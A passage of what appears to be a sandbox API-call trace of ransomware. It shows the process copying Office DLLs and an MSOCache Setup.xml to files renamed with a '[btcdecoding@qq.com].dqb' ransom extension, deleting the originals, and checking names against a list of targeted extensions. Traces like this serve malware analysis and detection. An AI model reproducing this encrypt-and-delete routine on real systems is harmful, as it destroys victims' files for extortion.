lpFileSize=0x303ff1c*=518984) returned 1 [0061.629] CloseHandle (hObject=0x180) returned 1 [0061.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll")) returned 0x20 [0061.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0061.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0061.629] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.629] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0061.630] GetLastError () returned 0x0 [0061.630] ReadFile (in: hFile=0x180, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x7eb48, lpOverlapped=0x0) returned 1 [0061.714] WriteFile (in: hFile=0x15c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x7eb50, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x7eb50, lpOverlapped=0x0) returned 1 [0061.722] ReadFile (in: hFile=0x180, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0061.722] WriteFile (in: hFile=0x15c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0061.722] SetEndOfFile (hFile=0x15c) returned 1 [0061.722] CloseHandle (hObject=0x15c) returned 1 [0061.722] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.722] SetEndOfFile (hFile=0x180) returned 1 [0061.726] CloseHandle (hObject=0x180) returned 1 [0061.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.727] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll")) returned 1 [0061.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.727] lstrlenW (lpString=".doc") returned 4 [0061.727] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.727] lstrlenW (lpString=".docx") returned 5 [0061.727] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0061.727] lstrlenW (lpString=".pdf") returned 4 [0061.727] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.727] lstrlenW (lpString=".xls") returned 4 [0061.727] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.727] lstrlenW (lpString=".xlsx") returned 5 [0061.727] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0061.727] lstrlenW (lpString=".ppt") returned 4 [0061.727] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.727] lstrlenW (lpString=".zip") returned 4 [0061.727] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.727] lstrlenW (lpString=".rar") returned 4 [0061.727] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.727] lstrlenW (lpString=".bz2") returned 4 [0061.727] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.727] lstrlenW (lpString=".7z") returned 3 [0061.727] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.727] lstrlenW (lpString=".dbf") returned 4 [0061.727] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.727] lstrlenW (lpString=".1cd") returned 4 [0061.727] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.728] lstrlenW (lpString=".jpg") returned 4 [0061.728] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.728] lstrlenW (lpString=".doc") returned 4 [0061.728] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.728] lstrlenW (lpString=".docx") returned 5 [0061.728] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0061.728] lstrlenW (lpString=".pdf") returned 4 [0061.728] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.728] lstrlenW (lpString=".xls") returned 4 [0061.728] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.728] lstrlenW (lpString=".xlsx") returned 5 [0061.728] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1 [0061.728] lstrlenW (lpString=".ppt") returned 4 [0061.728] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.728] lstrlenW (lpString=".zip") returned 4 [0061.728] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.728] lstrlenW (lpString=".rar") returned 4 [0061.728] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.728] lstrlenW (lpString=".bz2") returned 4 [0061.728] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.728] lstrlenW (lpString=".7z") returned 3 [0061.728] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.728] lstrlenW (lpString=".dbf") returned 4 [0061.728] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.728] lstrlenW (lpString=".1cd") returned 4 [0061.728] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 66 [0061.729] lstrlenW (lpString=".jpg") returned 4 [0061.729] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.729] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0061.729] lstrlenW (lpString="EXP_PDF.DLL") returned 11 [0061.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0061.774] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=138616) returned 1 [0061.774] CloseHandle (hObject=0x1e4) returned 1 [0061.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll")) returned 0x20 [0061.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0061.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0061.774] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.774] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0061.775] GetLastError () returned 0x0 [0061.775] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x21d78, lpOverlapped=0x0) returned 1 [0061.812] WriteFile (in: hFile=0x21c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x21d80, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x21d80, lpOverlapped=0x0) returned 1 [0061.815] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0061.815] WriteFile (in: hFile=0x21c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0061.815] SetEndOfFile (hFile=0x21c) returned 1 [0061.815] CloseHandle (hObject=0x21c) returned 1 [0061.815] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.815] SetEndOfFile (hFile=0x1e4) returned 1 [0061.817] CloseHandle (hObject=0x1e4) returned 1 [0061.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.817] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll")) returned 1 [0061.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.881] lstrlenW (lpString=".doc") returned 4 [0061.881] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.881] lstrlenW (lpString=".docx") returned 5 [0061.881] lstrcmpiW (lpString1=".docx", lpString2="F.DLL") returned -1 [0061.881] lstrlenW (lpString=".pdf") returned 4 [0061.881] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.881] lstrlenW (lpString=".xls") returned 4 [0061.881] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.881] lstrlenW (lpString=".xlsx") returned 5 [0061.881] lstrcmpiW (lpString1=".xlsx", lpString2="F.DLL") returned -1 [0061.881] lstrlenW (lpString=".ppt") returned 4 [0061.881] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.881] lstrlenW (lpString=".zip") returned 4 [0061.881] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.881] lstrlenW (lpString=".rar") returned 4 [0061.881] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.881] lstrlenW (lpString=".bz2") returned 4 [0061.882] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.882] lstrlenW (lpString=".7z") returned 3 [0061.882] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.882] lstrlenW (lpString=".dbf") returned 4 [0061.882] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.882] lstrlenW (lpString=".1cd") returned 4 [0061.882] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.882] lstrlenW (lpString=".jpg") returned 4 [0061.882] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.882] lstrlenW (lpString=".doc") returned 4 [0061.882] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.882] lstrlenW (lpString=".docx") returned 5 [0061.882] lstrcmpiW (lpString1=".docx", lpString2="F.DLL") returned -1 [0061.882] lstrlenW (lpString=".pdf") returned 4 [0061.882] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.882] lstrlenW (lpString=".xls") returned 4 [0061.882] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.882] lstrlenW (lpString=".xlsx") returned 5 [0061.882] lstrcmpiW (lpString1=".xlsx", lpString2="F.DLL") returned -1 [0061.882] lstrlenW (lpString=".ppt") returned 4 [0061.882] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.882] lstrlenW (lpString=".zip") returned 4 [0061.882] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.882] lstrlenW (lpString=".rar") returned 4 [0061.882] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.882] lstrlenW (lpString=".bz2") returned 4 [0061.882] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.883] lstrlenW (lpString=".7z") returned 3 [0061.883] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.883] lstrlenW (lpString=".dbf") returned 4 [0061.883] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.883] lstrlenW (lpString=".1cd") returned 4 [0061.883] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 67 [0061.883] lstrlenW (lpString=".jpg") returned 4 [0061.883] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.883] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0061.883] lstrlenW (lpString="IACOM2.DLL") returned 10 [0061.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 15 os_tid = 0xad8 [0032.437] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x38c06a0 [0032.437] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x38d06a8 [0032.438] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0390 [0032.438] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5c30d0 [0032.438] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c03a8 [0032.438] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3ca0020 [0032.438] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c03c0 [0032.438] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c03c0, Size=0x20) returned 0x5a5ca0 [0032.438] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c03c0 [0032.438] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c03c0, Size=0x20) returned 0x5a5c78 [0032.438] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.438] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.438] Wow64DisableWow64FsRedirection (in: OldValue=0x317ff58 | out: OldValue=0x317ff58*=0x0) returned 1 [0032.438] lstrlenW (lpString="kernel32.dll") returned 12 [0032.438] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.438] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.439] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.439] Sleep (dwMilliseconds=0x64) [0032.620] Sleep (dwMilliseconds=0x64) [0033.066] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0033.066] lstrlenW (lpString="Setup.xml") returned 9 [0033.066] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.380] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1608) returned 1 [0033.380] CloseHandle (hObject=0x174) returned 1 [0033.380] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0033.380] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.312] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.312] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.312] GetLastError () returned 0x0 [0034.312] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x648, lpOverlapped=0x0) returned 1 [0034.325] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x650, lpOverlapped=0x0) returned 1 [0034.326] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.326] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.326] SetEndOfFile (hFile=0x1a0) returned 1 [0034.326] CloseHandle (hObject=0x1a0) returned 1 [0034.327] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.327] SetEndOfFile (hFile=0x1a4) returned 1 [0034.328] CloseHandle (hObject=0x1a4) returned 1 [0034.328] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.328] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.329] lstrlenW (lpString=".doc") returned 4 [0034.329] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString=".docx") returned 5 [0034.329] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.329] lstrlenW (lpString=".pdf") returned 4 [0034.329] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString=".xls") returned 4 [0034.329] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString=".xlsx") returned 5 [0034.329] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.329] lstrlenW (lpString=".ppt") returned 4 [0034.329] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.329] lstrlenW (lpString=".zip") returned 4 [0034.329] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.329] lstrlenW (lpString=".rar") returned 4 [0034.329] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString=".bz2") returned 4 [0034.329] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString=".7z") returned 3 [0034.329] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.329] lstrlenW (lpString=".dbf") returned 4 [0034.329] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.329] lstrlenW (lpString=".1cd") returned 4 [0034.329] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.329] lstrlenW (lpString=".jpg") returned 4 [0034.329] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.329] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.330] lstrlenW (lpString=".doc") returned 4 [0034.330] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".docx") returned 5 [0034.330] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.330] lstrlenW (lpString=".pdf") returned 4 [0034.330] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".xls") returned 4 [0034.330] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".xlsx") returned 5 [0034.330] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.330] lstrlenW (lpString=".ppt") returned 4 [0034.330] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All 